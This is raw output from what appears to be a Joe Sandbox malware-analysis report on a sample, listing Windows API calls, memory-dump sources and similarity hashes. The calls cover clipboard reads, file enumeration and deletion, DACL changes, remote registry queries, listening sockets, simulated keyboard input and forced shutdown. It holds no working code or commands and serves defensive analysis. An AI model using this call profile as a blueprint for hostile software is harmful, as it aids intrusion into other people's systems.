• GetClipboardData.USER32(0000000D), ref: 002570D9
• CloseClipboard.USER32 ref: 002570E5
• GlobalLock.KERNEL32(00000000), ref: 00257101
• CloseClipboard.USER32 ref: 0025710B
• GlobalUnlock.KERNEL32(00000000), ref: 00257120
• IsClipboardFormatAvailable.USER32(00000001), ref: 0025712D
• GetClipboardData.USER32(00000001), ref: 00257135
• GlobalLock.KERNEL32(00000000), ref: 00257142
• GlobalUnlock.KERNEL32(00000000), ref: 00257176
• CloseClipboard.USER32 ref: 00257283
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
• String ID:
• API String ID: 3222323430-0
• Opcode ID: 15de8358e34d88055e4938649825e1ec8a0aa400d859423204573767dc3cd83c
• Instruction ID: 7f787e46f75aa9937a4985467ed14a400862b8a7b3a00f94fb70caf57c22c791
• Opcode Fuzzy Hash: 15de8358e34d88055e4938649825e1ec8a0aa400d859423204573767dc3cd83c
• Instruction Fuzzy Hash: 2351B275258306ABD300FF60FC4AF6E77A8AF84B11F004519F946D61D2EB70D9198B66
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 0024FE03
• FindClose.KERNEL32(00000000), ref: 0024FE57
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0024FE7C
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0024FE93
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0024FEBA
• __swprintf.LIBCMT ref: 0024FF06
• __swprintf.LIBCMT ref: 0024FF3F
  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
• __swprintf.LIBCMT ref: 0024FF93
  • Part of subcall function 0022234B: __woutput_l.LIBCMT ref: 002223A4
• __swprintf.LIBCMT ref: 0024FFE1
• __swprintf.LIBCMT ref: 00250030
• __swprintf.LIBCMT ref: 0025007F
• __swprintf.LIBCMT ref: 002500CE
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l_memmove
• String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
• API String ID: 108614129-2428617273
• Opcode ID: 5a8d106ab6283483c87658e175edf7de80460d83da707806537ed0d01d5185b1
• Instruction ID: b11635977ce039aad1512e0134173790a60207c8317b9ac498b4c7656d8e96dc
• Opcode Fuzzy Hash: 5a8d106ab6283483c87658e175edf7de80460d83da707806537ed0d01d5185b1
• Instruction Fuzzy Hash: 9FA131B2528344ABC314EFA4CC85DAFB7EDAF94700F44095DF595C2192EB34EA58CB62
APIs
• FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00252065
• _wcscmp.LIBCMT ref: 0025207A
• _wcscmp.LIBCMT ref: 00252091
• GetFileAttributesW.KERNEL32(?), ref: 002520A3
• SetFileAttributesW.KERNEL32(?,?), ref: 002520BD
• FindNextFileW.KERNEL32(00000000,?), ref: 002520D5
• FindClose.KERNEL32(00000000), ref: 002520E0
• FindFirstFileW.KERNEL32(*.*,?), ref: 002520FC
• _wcscmp.LIBCMT ref: 00252123
• _wcscmp.LIBCMT ref: 0025213A
• SetCurrentDirectoryW.KERNEL32(?), ref: 0025214C
• SetCurrentDirectoryW.KERNEL32(002B3A68), ref: 0025216A
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00252174
• FindClose.KERNEL32(00000000), ref: 00252181
• FindClose.KERNEL32(00000000), ref: 00252191
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
• API String ID: 1803514871-438819550
• Opcode ID: 0c0c8215f9bcab82496c585825bf34f02d6d9747834a41a527a23762c326970f
• Instruction ID: ccb8c6312b180a56f33e5e0f2189539bdf9ac0fb9739a73aa952f9c107f3e25a
• Opcode Fuzzy Hash: 0c0c8215f9bcab82496c585825bf34f02d6d9747834a41a527a23762c326970f
• Instruction Fuzzy Hash: C031BE3651161AFACB10EFA4EC4CADE73AC9F06361F104156FD18E21D1DA70EA6CCB68
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 002521C0
                                                                                                                • _wcscmp.LIBCMT ref: 002521D5
                                                                                                                • _wcscmp.LIBCMT ref: 002521EC
                                                                                                                  • Part of subcall function 00247606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00247621
                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0025221B
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00252226
                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00252242
                                                                                                                • _wcscmp.LIBCMT ref: 00252269
                                                                                                                • _wcscmp.LIBCMT ref: 00252280
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00252292
                                                                                                                • SetCurrentDirectoryW.KERNEL32(002B3A68), ref: 002522B0
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 002522BA
                                                                                                                • FindClose.KERNEL32(00000000), ref: 002522C7
                                                                                                                • FindClose.KERNEL32(00000000), ref: 002522D7
                                                                                                                Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 1824444939-438819550
Similarity
• API ID: _memmove_memset
• String ID: Q\E$[$\$\$\$]$^
• API String ID: 3555123492-286096704
APIs
  • Part of subcall function 0023B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0023B903
  • Part of subcall function 0023B8E7: GetLastError.KERNEL32(?,0023B3CB,?,?,?), ref: 0023B90D
  • Part of subcall function 0023B8E7: GetProcessHeap.KERNEL32(00000008,?,?,0023B3CB,?,?,?), ref: 0023B91C
  • Part of subcall function 0023B8E7: HeapAlloc.KERNEL32(00000000,?,0023B3CB,?,?,?), ref: 0023B923
  • Part of subcall function 0023B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0023B93A
  • Part of subcall function 0023B982: GetProcessHeap.KERNEL32(00000008,0023B3E1,00000000,00000000,?,0023B3E1,?), ref: 0023B98E
  • Part of subcall function 0023B982: HeapAlloc.KERNEL32(00000000,?,0023B3E1,?), ref: 0023B995
  • Part of subcall function 0023B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0023B3E1,?), ref: 0023B9A6
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0023B3FC
• _memset.LIBCMT ref: 0023B411
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0023B430
• GetLengthSid.ADVAPI32(?), ref: 0023B441
• GetAce.ADVAPI32(?,00000000,?), ref: 0023B47E
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0023B49A
• GetLengthSid.ADVAPI32(?), ref: 0023B4B7
• GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0023B4C6
• HeapAlloc.KERNEL32(00000000), ref: 0023B4CD
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 0023B4EE
• CopySid.ADVAPI32(00000000), ref: 0023B4F5
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0023B526
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0023B54C
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 0023B560
Similarity
• API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
• API String ID: 3996160137-0
APIs
  • Part of subcall function 002031B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 002031DA
  • Part of subcall function 00247C0C: GetFileAttributesW.KERNEL32(?,00246A7B), ref: 00247C0D
• _wcscat.LIBCMT ref: 00246E7E
• __wsplitpath.LIBCMT ref: 00246E99
• FindFirstFileW.KERNEL32(?,?), ref: 00246EAE
• _wcscpy.LIBCMT ref: 00246EDD
• _wcscat.LIBCMT ref: 00246EEF
• _wcscat.LIBCMT ref: 00246F01
• DeleteFileW.KERNEL32(?), ref: 00246F0E
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00246F22
• FindClose.KERNEL32(00000000), ref: 00246F3D
Similarity
• API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
• String ID: \*.*
• API String ID: 2643075503-1173974218
Similarity
• String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_START_OPT)$UCP)$UTF)$UTF16)
• API String ID: 0-2893523900
APIs
  • Part of subcall function 00263AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00262AA6,?,?), ref: 00263B0E
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0026317F
  • Part of subcall function 002084A6: __swprintf.LIBCMT ref: 002084E5
  • Part of subcall function 002084A6: __itow.LIBCMT ref: 00208519
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0026321E
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 002632B6
• RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 002634F5
• RegCloseKey.ADVAPI32(00000000), ref: 00263502
Similarity
• API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
• API String ID: 1240663315-0
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• API String ID: 1737998785-0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0023A857: CLSIDFromProgID.OLE32 ref: 0023A874
                                                                                                                  • Part of subcall function 0023A857: ProgIDFromCLSID.OLE32(?,00000000), ref: 0023A88F
                                                                                                                  • Part of subcall function 0023A857: lstrcmpiW.KERNEL32(?,00000000), ref: 0023A89D
                                                                                                                  • Part of subcall function 0023A857: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 0023A8AD
                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0025C6AD
                                                                                                                • _memset.LIBCMT ref: 0025C6BA
                                                                                                                • _memset.LIBCMT ref: 0025C7D8
                                                                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0025C804
                                                                                                                • CoTaskMemFree.OLE32(?), ref: 0025C80F
                                                                                                                Strings
                                                                                                                • NULL Pointer assignment, xrefs: 0025C85D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                • String ID: NULL Pointer assignment
                                                                                                                • API String ID: 1300414916-2785691316
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
                                                                                                                • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 002524F6
                                                                                                                • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00252526
                                                                                                                • _wcscmp.LIBCMT ref: 0025253A
                                                                                                                • _wcscmp.LIBCMT ref: 00252555
                                                                                                                • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 002525F3
                                                                                                                • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00252609
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 713712311-438819550
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                • API String ID: 0-1546025612
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 4104443479-0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0023BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0023BF0F
                                                                                                                  • Part of subcall function 0023BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0023BF3C
                                                                                                                  • Part of subcall function 0023BEC3: GetLastError.KERNEL32 ref: 0023BF49
                                                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 0024830C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                • String ID: $@$SeShutdownPrivilege
                                                                                                                • API String ID: 2234035333-194228
                                                                                                                APIs
                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00259235
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00259244
                                                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00259260
                                                                                                                • listen.WSOCK32(00000000,00000005), ref: 0025926F
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00259289
                                                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 0025929D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279440585-0
                                                                                                                APIs
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00246F7D
                                                                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00246F8D
                                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00246FAC
                                                                                                                • __wsplitpath.LIBCMT ref: 00246FD0
                                                                                                                • _wcscat.LIBCMT ref: 00246FE3
                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00247022
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                • String ID:
                                                                                                                • API String ID: 1605983538-0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID: hN+$tM+
                                                                                                                • API String ID: 4104443479-867538968
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0022010A: std::exception::exception.LIBCMT ref: 0022013E
                                                                                                                  • Part of subcall function 0022010A: __CxxThrowException@8.LIBCMT ref: 00220153
                                                                                                                • _memmove.LIBCMT ref: 00273020
                                                                                                                • _memmove.LIBCMT ref: 00273135
                                                                                                                • _memmove.LIBCMT ref: 002731DC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                • String ID:
                                                                                                                • API String ID: 1300846289-0
                                                                                                                • Opcode ID: 2a006c69253e33636f40ab70aedaee15f1a4090c8e0c25d874d8984e8aee7eb7
                                                                                                                • Instruction ID: 955790cf21f4e0c53cba246765a29f3734818934cacd618b4bcff9b67ff17c40
                                                                                                                • Opcode Fuzzy Hash: 2a006c69253e33636f40ab70aedaee15f1a4090c8e0c25d874d8984e8aee7eb7
                                                                                                                • Instruction Fuzzy Hash: C0029270A20205DFCF04DF64D981AAEB7F5EF48300F54C069E80ADB296EB35DA65DB91
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0025ACD3: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0025ACF5
                                                                                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 0025973D
                                                                                                                • WSAGetLastError.WSOCK32(00000000,00000000), ref: 00259760
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastinet_addrsocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 4170576061-0
                                                                                                                • Opcode ID: 57093911b0593c6b341f2390db383e41f4ab6d4f5ba61828f9ecd91962f72ad7
                                                                                                                • Instruction ID: 505a03868656f74cd350834690233c2b464362d43dd1fea7f872fe5aa49e40ed
                                                                                                                • Opcode Fuzzy Hash: 57093911b0593c6b341f2390db383e41f4ab6d4f5ba61828f9ecd91962f72ad7
                                                                                                                • Instruction Fuzzy Hash: F941D574620200AFDB14AF24CC86E7EB7EDDF44724F548049F956AB3D2CA74AD618B91
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0024F37A
                                                                                                                • _wcscmp.LIBCMT ref: 0024F3AA
                                                                                                                • _wcscmp.LIBCMT ref: 0024F3BF
                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0024F3D0
                                                                                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0024F3FE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                • String ID:
                                                                                                                • API String ID: 2387731787-0
                                                                                                                • Opcode ID: 764f79ca06a7c7417af6d41b26902bc6d7b9fc14c8a720e01e164899395aa17d
                                                                                                                • Instruction ID: 9351305ab98fff1890a86d122814ff9924c071d1dcdeb43c40fce2c7c28dfc3f
                                                                                                                • Opcode Fuzzy Hash: 764f79ca06a7c7417af6d41b26902bc6d7b9fc14c8a720e01e164899395aa17d
                                                                                                                • Instruction Fuzzy Hash: 2C41CB35610302DFC708DF28C490A9AB3E4FF89324F10416DEA5ACB3A2DB71A965CF90
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                • String ID:
                                                                                                                • API String ID: 292994002-0
                                                                                                                • Opcode ID: ac603c20dd9498a5d6eccc1d912e5dee41ebe65d6985f00c020a30160b40e6c4
                                                                                                                • Instruction ID: 9a3410a0225aafcca6c7dba7dc3582c5dcde0a34f498b30252d5d8d908f39ed6
                                                                                                                • Opcode Fuzzy Hash: ac603c20dd9498a5d6eccc1d912e5dee41ebe65d6985f00c020a30160b40e6c4
                                                                                                                • Instruction Fuzzy Hash: E9110435324212ABE7201F26BC44E2A7BD9EF54728B000028F806C3181DB34DDA18AA0
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,002620EC,?,002622E0), ref: 00262104
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00262116
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: GetProcessId$kernel32.dll
                                                                                                                • API String ID: 2574300362-399901964
                                                                                                                • Opcode ID: 3c73ce574d674648b49690be02efb4cce8c0592b88054b59a7ce96f9892c14cd
                                                                                                                • Instruction ID: d486d81189c80df786142a53f618c078c1b8f5ad4959a0a5b2d45f2442fabbd7
                                                                                                                • Opcode Fuzzy Hash: 3c73ce574d674648b49690be02efb4cce8c0592b88054b59a7ce96f9892c14cd
                                                                                                                • Instruction Fuzzy Hash: 74D0A738424B23DFD7306F61F84D64237D4AF05701B004459EA5DD1196D770C4D8CB10
                                                                                                                APIs
                                                                                                                • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 0024439C
                                                                                                                • SetKeyboardState.USER32(00000080,?,00000001), ref: 002443B8
                                                                                                                • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00244425
                                                                                                                • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00244483
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 432972143-0
                                                                                                                • Opcode ID: 1f62874ac3e9214a683e71cff362d68b30b6b4746f68c77e521e0f82b104f40e
                                                                                                                • Instruction ID: 83041a71bf5af90c21c6c36745ae83e246e31edbbaf9385e8fa45a02f9cdcb62
                                                                                                                • Opcode Fuzzy Hash: 1f62874ac3e9214a683e71cff362d68b30b6b4746f68c77e521e0f82b104f40e
                                                                                                                • Instruction Fuzzy Hash: A64148B0A20249AAEF38AF64D8087FDBFB5AB44311F04015AF481972C1C7B49DA4CB61
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0024221E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
